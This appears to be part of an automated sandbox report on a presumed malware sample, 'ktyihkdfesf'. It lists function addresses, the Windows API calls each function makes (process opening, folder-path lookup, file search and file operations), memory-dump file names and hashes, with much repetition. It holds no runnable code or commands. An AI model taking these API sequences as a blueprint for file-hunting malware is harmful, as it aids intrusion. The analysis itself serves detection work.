                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateObjectSingleSleepThreadWaitlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 309549813-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                                  • Instruction ID: b65bf78c018c26f30e4a94ab22d84a19a40ae7d672281f86a08f23e214b62c4f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8e46a763f59d357cb157831e2caf77c99b8258767ef6419c4d21c1fd91626e4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA41B1312143409FD314EF61D895BDEB3E9ABC8304F40481EF48A97291DBBCAD89CB66
                                                                                                                                                                                                                                                                                                  Function 00411CC0 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00411CDD
                                                                                                                                                                                                                                                                                                  • K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00411CF4
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00411CFB
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseFileHandleModuleNameOpenProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3183270410-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 17c2f96a6e384425bd33d4ac7292e407ff3d1e4c2ad55af778a65a8cd36ca61f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 640dad66fecb186e80dcf41244515ab4ac3902d155f7ecbd00ab4fd3f5a4e88e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77E092B13002107BD7206769AC4AFEB3A69AB85B55F040419F785CB2C0CAB598C083E2
                                                                                                                                                                                                                                                                                                  Function 00411550 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FolderPathlstrcpy
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1699248803-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 15d096accc25870f1c61d4fec85a6e9edf64df49f5c63818c5a2d69bf229bf11
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1160e0b7f1aa9f4cd5700b1ca12f0395d0d03c746d585bc572386d3e44047f0e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CAF030756443406BD2209B18DC85B6BB7A9EFC4755F00882DF68957381C6349C1586A6
                                                                                                                                                                                                                                                                                                  Function 00411520 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                                  • Instruction ID: fe820049153354b6effd4291471353984c4611ada376a903b3c10ac4968f751e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb211eadf6e2018455b62e0e4d58cc15ac1c3b02b046a00b78ea14b051ebdca4
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87D0A7773013225F4B006AEA2C948CF530DEBC0358741042FF50097100CA686D4B86F9
                                                                                                                                                                                                                                                                                                  Function 00411F50 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SHFileOperationA.SHELL32(?), ref: 00411F94
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: FileOperation
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3080627654-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                                                  • Instruction ID: dccbb589212da41187320816474e935ed05e6db7b62261ff46e18f4692dac182
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c3e2beda51f352537e61fd5ee3caea32b3d27932eb1cd671ceaa09e9ee001911
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CE07EB0608301ABE300DF46D55970BBBE0EB98308F40885DF0948B250D3B9C69C8B9B
                                                                                                                                                                                                                                                                                                  Function 004115B0 Relevance: 1.3, APIs: 1, Instructions: 85memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,?,00416A58,00000000,00000000), ref: 004115D4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2788313436.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AllocLocal
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3494564517-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
                                                                                                                                                                                                                                                                                                  • Instruction ID: ab5a9e63b36d8a4e180a9fb52d0f1ced6ce58d3d562b5a6390f3396a209e36a0
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b38a9e7ed61c5d22f0853085b7a7a3d5c5348526e860f7e8d8c563a0389266a6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88219E31608A520FC73A4F3945D0BB6B752AF97245B0DC37FDA4507777DA2A48C54264

                                                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                                                  Function 00415700 Relevance: 63.5, APIs: 27, Strings: 9, Instructions: 493memorystringfileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                                  • strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0041589C
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 004158FF
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787418350.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787527818.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787555263.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.00000000005AF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2787609891.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
